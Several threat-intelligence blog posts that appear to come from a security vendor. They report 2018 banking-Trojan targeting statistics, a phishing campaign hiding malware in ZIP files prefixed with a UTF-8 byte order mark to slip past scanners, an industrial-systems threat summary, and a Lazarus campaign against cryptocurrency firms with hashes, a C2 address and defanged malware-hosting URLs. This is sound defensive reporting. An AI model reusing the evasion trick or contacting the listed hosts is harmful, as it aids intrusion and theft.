Cybercriminals actively tried to monetize interest in cryptocurrencies and obtain data from victims to steal funds. The majority of attacks that we detected on users of cryptocurrency services featured Ramnit Banker (53%). In addition, the Chthonic and Panda bankers, both modifications of the notorious ZeuS banker, dramatically increased the number of unique masks linked to cryptocurrency wallets and exchanges. The CapCoiner Trojan, which specifically targets such resources, also displayed major activity in this area.

Distribution of Trojans families by share of attacks on users of cryptocurrency services, 2018

Geography of attack targets

Note: If the target mask contains a TLD (top-level domain) that can be used to determine the country, this country is entered in the statistics. If the country cannot be determined from the TLD (for example, .com), the country where the organization’s headquarters are located is entered in the statistics.

In 2018, the ranking of Top 10 countries by number of unique target masks changed order, but not composition. As in the previous year, clients of organizations in the US were the most frequent targets of attacks in 2018.

2017 2018 1 United States 31.29% United States 34.84% 2 Germany 11.15% Britain 9.97% 3 Britain 9.20% Italy 7.46% 4 Italy 7.52% Canada 6.16% 5 Canada 6.96% Germany 3.88% 6 Australia 4.67% Spain 3.14% 7 France 4.57% Switzerland 3.04% 8 Spain 2.87% France 3.02% 9 China 2.50% Australia 2.29% 10 Switzerland 2.17% China 2.11%

In 2018, the share of unique attacks on clients of organizations located in Germany fell significantly. This is because in 2017 most of these attacks were carried out by BetaBot (almost 75% of all registered unique attacks), while in 2018 its share barely exceeded 1.5%. Even with Danabot attacks registered in 2018 on clients of German banks, Germany still couldn’t retain second place in our ranking.

Geography of attack targets, 2017

Among the other changes observed was a decline in the share of attacked clients of Australian organizations from 4.67% to 2.29%. Almost all bots reduced the number of unique masks focused on Australia. For instance, among the Gozi banker attacks we observed in 2018, there were practically none against clients of financial organizations in Australia, whereas in 2017 they accounted for more than 90% of registered attacks by this malware.

Geography of attack targets, 2018

But it’s not all good news. Many varieties of malware expanded their geography: In 2018, the Trickster (TrickBot) banker added no fewer than 11 countries to its target list, while the SpyEye Trojan and the IcedID banker picked up 9 and 5 more countries, respectively.

Unsurprisingly, the most frequently attacked users of cryptocurrency services were located in the US, Luxembourg, and China, since many cryptocurrency services are registered in these countries. In addition, the number of attacks in 2018 on users of services registered in Britain, Singapore, Estonia, South Korea, and Switzerland climbed significantly.

Geography of cryptocurrency services whose users were attacked, 2017

Geography of cryptocurrency services whose users were attacked, 2018

Geography of C&C centers

This section gives statistics on the geography of botnet C&C centers that sent commands to launch an attack.

In 2017, the largest slice of C&C centers was located in Ukraine (24.25%), with almost 60% of them made up of C&C servers for the abovementioned Gozi banker.

Geography of C&C centers in 2017

In 2018, Russia (29.61%) was top of the leaderboard by number of C&C centers directing attacks against clients of various organizations. More than half (54%) of these C&C centers were used by the Panda banker.

Geography of C&C centers, 2018

Most active families BetaBot

Trojan Banker BetaBot accounted for 13.25% of all unique attacks in 2018.

Geography of BetaBot targets, 2018

Key features (shares relative to the number of unique BetaBot attacks):

  • Geography of targets: 42 countries
  • Most attacked countries: US (73.60%), China (6.35%), Britain (6.11%)
  • Most attacked categories of organizations: Financial Services (37.43%), Global Portals and Social Networks (18.16%)
Trickster (TrickBot)

The TrickBot banker accounted for 12.85% of all unique attacks in 2018.

Geography of TrickBot targets, 2018

Key features (shares relative to the number of unique TrickBot attacks):

  • Geography of targets: 65 countries
  • Most attacked countries: Britain (11.02%), US (9.34%), Germany (7.99%)
  • Most attacked categories of organizations: Financial Services (96.97%), Cryptocurrency Services (1.72%)

The Panda banker accounted for 9.84% of all unique attacks in 2018.

Geography of Panda targets, 2018

Key features (shares relative to the number of unique Panda attacks):

  • Geography of targets: 33 countries
  • Most attacked countries: Canada (24.89%), US (22.93%), Italy (17.90%)
  • Most attacked categories of organizations: Financial Services (80.88%), Cryptocurrency Services (10.26%)

SpyEye accounted for 8.05% of all unique attacks in 2018.

Geography of SpyEye targets, 2018

Key features (shares relative to the number of unique SpyEye attacks):

  • Geography of targets: 32 countries
  • Most attacked countries: US (35.01%), Britain (14.38%), Germany (13.57%)
  • Most attacked categories of organizations: Financial Services (98.04%)

Ramnit accounted for 7.97% of all unique attacks in 2018 registered by Botnet Monitoring. Ramnit’s impressive geography covers 66 countries.

Geography of Ramnit targets, 2018

Key features (shares relative to the number of unique Ramnit attacks):

  • Geography of targets: 66 countries
  • Most attacked countries: Britain (25.70%), US (20.12%), China (7.78%)
  • Most attacked categories of organizations: Financial Services (47.76%), Cryptocurrency Services (46.83%)

Our analysis of commands issued to attack clients of organizations in 2018 identified the following main trends:

  • The reduction in the total number of registered unique attacks may indicate cybercriminals’ preference to create target masks that cover a large number of resources of one organization and stay relevant for a prolonged period.
  • Absolute majority of attacks still targets financial organizations and their clients.
  • The number of attacks on clients of cryptocurrency services increased significantly (compared to 2017). The number of such attacks is not expected to fall; on the contrary, it may rise given that more and more bots are deploying web injections against such resources.
  • New target masks are proliferating. Cybercriminals are adding new, previously unencountered targets as well as modifying old masks to cover more websites where user data or money can be stolen.
2019. március 28.

The return of the BOM

There’s nothing new in Brazilian cybercriminals trying out new ways to stay under the radar. It’s just that this time around the bad guys have started using a method that was reported in the wild years ago.

Russian gangs used this technique to distribute malware capable of modifying the hosts file on Windows systems. Published by McAfee in 2013, the UTF-8 BOM (Byte Order Mark) additional bytes helped these malicious crews avoid detection.

Since these campaigns depended on spear phishing to increase the victim count, the challenge was to fool email scanners and use a seemingly corrupted file that lands in the victim’s inbox.

The first indicator appears when the user tries to open the ZIP file with the default file explorer and sees the following error:

The error message suggests the file is corrupt, but when we check its contents we see something strange in there.

Zip header prefixed by UTF-8 BOM

Instead of having the normal ZIP header starting with the “PK” signature (0x504B), we have three extra bytes (0xEFBBBF) that represent the Byte Order Mark (BOM) usually found within UTF-8 text files. Some tools will not recognize this file as being a ZIP archive format, but will instead recognize it as an UTF-8 text file and fail to extract the malicious payload.

However, utilities such as WinRAR and 7-Zip ignore this data and extract the content correctly. Once the user extracts the file with any of these utilities they can execute it and infect the system.

The file is successfully extracted by WinRAR

The malicious executable acts as a loader for the main payload which is embedded in the resource section.

Resource table showing the resource containing the encrypted data

Encrypted DLL stored in resource section

The content stored inside the resource, encrypted with a XOR-based algorithm, is commonly seen in different malware samples from Brazil. The decrypted resource is a DLL that will load and execute the exported function “BICDAT”.

Code used to load the extracted DLL and execute the exported function BICDAT

This library will then download a second stage payload which is a password-protected ZIP file and encrypted with the same function as the embedded payload. After extracting all the files, the loader will then launch the main executable.

Code executed by BICDAT function

Strings related to Banking RAT malware

The final payload that’s delivered is a variant of a Banking RAT malware, which is currently widespread in Brazil and Chile.

Kaspersky Lab products can extract and analyze compressed ZIP files containing the Byte Order Mark without any problem.

Indicators of compromise


2019. március 27.

Threat Landscape for Industrial Automation Systems in H2 2018

H2 2018 in figures

All statistical data used in this report was collected using the Kaspersky Security Network (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions.

In H2 2018:

  • Kaspersky Lab products prevented malicious activity on 40.8% of ICS computers.
  • Kaspersky Lab security solutions detected over 19.1 thousand malware modifications from 2.7 thousand different families on industrial automation systems. As before, in the overwhelming majority of cases, attempted infections of ICS computers are random rather than parts of targeted attacks.
  • Trojan malware remains the most prevalent among threats that are relevant to ICS computers. Malware of this class was detected on 27.1% of ICS computers. The malicious activity of exploits was prevented on 3.2% of ICS computers,
  • backdoors were blocked on 3.1%,
  • ransomware – on 2% of ICS computers.

Percentage of ICS computers on which malicious objects of different classes were prevented, 2017 – 2018

  • In each month of 2018, the proportion of ICS computers on which malicious activity was prevented was higher than that in the same month of 2017.

Percentage of ICS computers on which malicious objects were detected

  • Countries with the highest proportions of ICS computers on which malicious objects were detected during H2 2018 were Vietnam (70.1%), Algeria (69.9%), and Tunisia (64.6%).
  • The most secure countries are Ireland (11.7%), Switzerland (14.9%), Denmark (15.2%), Hong Kong (15.3%), the UK (15.7%), and the Netherlands (15.7%).

Percentage of ICS computers on which malicious objects were detected in different countries of the world

  • As in the past years, the main sources of threats to computers in the industrial infrastructure of organizations are the internet (26.1%), removable media (8.3%), and email (4.9%).

Percentage of ICS computers on which malicious objects from different sources were detected

  • The percentage of ICS computers on which malicious email attachments were blocked has increased in nearly all regions of the world. This change probably reflects the growth in the number of phishing attacks on industrial enterprises in H2 2018.

Percentage of ICS computers on which malicious email attachments were blocked in different regions of the world

  • Phishing attacks are the main vector of targeted attacks on industrial companies. Malicious attachments from phishing emails pose a danger not only to office computers but also to some of the computers in the industrial infrastructure: Trojan-spy, backdoor and keylogger malware was blocked at least on 4.3% of ICS computers globally. All of these types of malware often show up in the phishing emails sent to industrial enterprises.
  • Western Europe (5.1%) is, surprisingly, one of the TOP 3 regions based on the percentage of ICS computers on which malicious email attachments were blocked. This is in large part due to the percentage for Germany nearly doubling (from 3.6% to 6.5%).
Vulnerabilities identified by Kaspersky Lab ICS CERT in 2018

Kaspersky Lab ICS CERT experts continued the previous year’s research on security issues affecting third-party hardware-based and software solutions that are widely used in industrial automation systems. A particular emphasis was placed on open-source products used in various vendors’ solutions. Analyzing car software for vulnerabilities became a new area of research for Kaspersky Lab ICS CERT.

  • In 2018, Kaspersky Lab ICS CERT identified 61 vulnerabilities in industrial and IIoT/IoT systems. Vendors closed 29 of these vulnerabilities during the year.

Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2018 by types of components analyzed

  • 46% of the vulnerabilities identified, if exploited, could lead to remote execution of arbitrary code on the target system or a denial-of-service (DoS) condition. A significant part of the vulnerabilities (21%) could also enable an attacker to bypass authentication.

Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2018 by possible exploitation consequences

  • During 2018, 37 CVE entries were published based on information about vulnerabilities identified by Kaspersky Lab ICS CERT (information on 15 vulnerabilities closed in 2018 had been provided to vendors in 2017).
  • The absolute majority of those vulnerabilities identified by Kaspersky Lab ICS CERT for which CVEs were published in 2018 have CVSS v.3 base scores of 7.0 or more, which places them in the most severe group. Seven of these vulnerabilities were assigned the highest possible base score of 10. These include vulnerabilities in third-party software, and LibVNCServer and LibVNCClient cross-platform solutions.

You can find information on the key events of H2 2018, an overview of vulnerabilities published during the year, and detailed statistics in the full version of the report on the Kaspersky Lab ICS CERT website.

2019. március 26.

Cryptocurrency businesses still being targeted by Lazarus

It’s hardly news to anyone who follows cyberthreat intelligence that the Lazarus APT group targets financial entities, especially cryptocurrency exchanges. Financial gain remains one of the main goals for Lazarus, with its tactics, techniques, and procedures constantly evolving to avoid detection.

In the middle of 2018, we published our Operation Applejeus research, which highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses. One of the key findings was the group’s new ability to target macOS. Since then Lazarus has been busy expanding its operations for the platform.

Further tracking of their activities targeting the financial sector enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and macOS malware for Apple users.

Infection procedure

Lazarus is a well-organized group, something that can be seen from their malware population: not only have we seen them build redundancy to reserve some malware in case of in-operation hot spare replacement of ‘burnt’ (detected) samples but they also conform to specific internal standards and protocols when developing backdoors. This case is no different. They have developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator. The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects. After establishing the malware control session with the server, the functionality provided by the malware includes:

  • Set sleep time (delay between C2 interactions)
  • Exit malware
  • Collect basic host information
  • Check malware status
  • Show current malware configuration
  • Update malware configuration
  • Execute system shell command
  • Download & Upload files

Lazarus uses different tactics to run its C2 servers: from purchasing servers to using hacked ones. We have seen some legitimate-looking servers that are most likely compromised and used in malicious campaigns. According to server response headers, they are most likely running an old vulnerable instance of Internet Information Services (IIS) 6.0 on Microsoft Windows Server 2003. Another C2 server was probably purchased by Lazarus from a hosting company and used to host macOS and Windows payloads. The geography of the servers varies, from China to the European Union. But why use two different types of servers? The group seems to have a rule (at least in this campaign) to only host malware on rented servers, while hosting C2 scripts for malware communication on compromised servers.

Infrastructure segregation by purpose

The malware was distributed via documents carefully prepared to attract the attention of cryptocurrency professionals. Seeing as how some of the documents were prepared in Korean, we believe that South Korean businesses are a high priority for Lazarus. One document entitled ‘Sample document for business plan evaluation of venture company’ (translated from Korean) looks like this:

Content of weaponized document from Lazarus (4cbd45fe6d65f513447beb4509a9ae3d)

Another macro-weaponized document (e9a6a945803722be1556fd120ee81199) contains a business overview of what seems to be a Chinese technology consulting group named LAFIZ. We couldn’t confirm if it’s a legitimate business or another fake company made up by Lazarus. Their website lafiz[.]link has been parked since 2017.

Contents of another weaponized document (e9a6a945803722be1556fd120ee81199)

Based on our telemetry, we found a cryptocurrency exchange company attacked with a malicious document containing the same macro. The document’s content provided information for coin listings with a translation in Korean:

Content of another weaponized document (6a0f3abd05bc75edbfb862739865a4cc)

The payloads show that Lazarus keeps exploring more ways to evade detection to stay under the radar longer. The group builds malware for 32-bit and 64-bit Windows separately to support both platforms and have more variety in terms of compiled code. The Windows payloads distributed from the server (nzssdm[.]com) hosting the Mac malware have a CheckSelf export function, and one of them (668d5b5761755c9d061da74cb21a8b75) has the internal name ‘battle64.dll’. From that point we managed to find additional Windows malware samples containing the CheckSelf export function and an internal name containing the word ‘battle’.

These Windows malware samples were delivered using malicious HWP (Korean Hangul Word Processor format) documents exploiting a known PostScript vulnerability. It should be noted that HWP documents are only popular among Korean users (Hangul Word Processor was developed in South Korea) and we have witnessed several attacks using the same method.

Connection with previous HWP attacks

It’s no secret that Apple products are now very popular among successful internet startups and fintech companies, and this is why the malicious actor built and used macOS malware. While investigating earlier Lazarus incidents, we anticipated this actor would eventually expand its attacks to macOS.

It appears that Lazarus is using the same developers to expand to other platforms, because some of the features have remained consistent as its malware evolves.

Overlap of current campaign and previous hwp-based attack cases

We’d therefore like to ask Windows and macOS users to be more cautious and not fall victim to Lazarus. If you’re part of the booming cryptocurrency or technological startup industry, exercise extra caution when dealing with new third parties or installing software on your systems. It’s best to check new software with an antivirus or at least use popular free virus-scanning services such as VirusTotal. And never ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources. Avoid being infected by fake or backdoored software from Lazarus – if you need to try out new applications, it’s better do so offline or on an isolated network virtual machine which you can erase with a few clicks. We’ll continue posting on Lazarus’s latest tactics and tricks in our blog. In the meantime, stay safe!

For more details on this and other research, please contact intelreports@kaspersky.com.

File Hashes:

Malicious office document used in real attack
4cbd45fe6d65f513447beb4509a9ae3d 샘플_기술사업계획서(벤처기업평가용).doc
6a0f3abd05bc75edbfb862739865a4cc 문의_Evaluation Table.xls

Testing office document
29a37c6d9fae5664946c6607f351a8dc list.doc
e9a6a945803722be1556fd120ee81199 list.doc
a18bc8bc82bca8245838274907e64631 list.doc

macOS malware

PowerShell script
cb713385655e9af0a2fc10da5c0256f5 test.ps1
e6d5363091e63e35490ad2d76b72e851 test.ps1 – It does not contain URLs.

Windows executable payload
171b9135540f89bf727b690b9e587a4e wwtm.dat
668d5b5761755c9d061da74cb21a8b75 wwtm.dat

Manuscrypt payload

Malicious hwp file
F392492ef5ea1b399b4c0af38810b0d6 일일동향보고_180913.hwp
0316f6067bc02c23c1975d83c659da21 국가핵심인력등록관리제등검토요청(10.16)(김경환변호사).hwp

Domains and IPs

Compromised first stage C2 server

Second stage C2 server
http://115.28.160[.]20:443 – Compromised server

Malware hosting server
http://nzssdm[.]com/assets/wwtm.dat – Windows payload distribution URL
http://nzssdm[.]com/assets/mt.dat – Mac payload distribution URL